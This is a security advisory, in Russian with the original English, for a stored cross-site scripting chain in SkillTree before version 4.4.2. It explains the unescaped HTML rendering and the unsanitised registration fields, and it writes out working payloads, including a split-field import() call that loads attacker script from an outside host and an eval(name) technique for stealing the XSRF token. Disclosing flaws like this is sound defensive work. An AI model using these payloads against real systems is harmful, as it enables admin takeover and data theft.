SkillTree — это платформа геймификации микрообучения. До версии 4.4.2 две независимые уязвимости кода объединялись в единую цепочку атак с тремя различными путями использования, последствия которых возрастали. `StringHighlighter.js` создает строку HTML, интерполируя необработанные подстроки `value` непосредственно в литерал шаблона без кодирования объекта HTML. `HighlightedValue.vue` отображает эту строку — и все нефильтрованные простые значения — с помощью директивы Vue `v-html`, которая устанавливает `innerHTML`. Отдельно конечная точка регистрации учетной записи принимает поля «firstName», «lastName» и «nickname» и сохраняет их без какой-либо очистки HTML.
Злоумышленник самостоятельно регистрируется с именем `firstName = "<img src=x onerror=alert(1)>"` (28 символов — в пределах 30-значного поля) и посещает любую викторину. В следующий раз, когда администратор откроет страницу «Выполнение викторины», полезные данные будут выполнены в его браузере. Существуют три пути атак с возрастающим воздействием.
Первый — это базовый межсайтовый скриптинг. Любая автономная полезная нагрузка, соответствующая ограничению в 30 символов (например, `<img src=x onerror=alert(1)>`, что составляет 28 символов), запускается автоматически, когда администратор переходит на страницу запусков при обычном использовании. Выполнение произвольного кода в браузере администратора подтверждается без дополнительных действий.
Второй — удаленная загрузка скрипта через import(). Используя технику разделения полей (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), злоумышленник загружает полный файл JavaScript со своего сервера. Файл не имеет ограничений по размеру и может выполнять любые действия администратора — удалять все проекты, создавать бэкдор-аккаунты, сбрасывать пользовательские данные, устанавливать кейлоггер.
Никакого фишинга не требуется. Единственное ограничение заключается в том, что URL-адрес должен содержать 11 символов (`//nsas.cc/p`). Третий — полная кража токена подделки межсайтовых запросов.
Используя `eval(name)`, злоумышленник предварительно устанавливает `window.name` в качестве полезной нагрузки для кражи данных, сначала отправив администратору одну ссылку перенаправления. Файл cookie сеанса является HttpOnly и не может быть прочитан через document.cookie; однако токен XSRF доступен для чтения, и злоумышленник использует выполнение того же источника для вызова API-интерфейсов администратора из браузера жертвы, передавая ответы на внешний сервер. Никакого вмешательства администратора, помимо обычного использования, не требуется.
Версия 4.4.2 содержит патч.
Показать оригинальное описание (EN)
SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.
Характеристики атаки
Последствия
Строка CVSS v3.1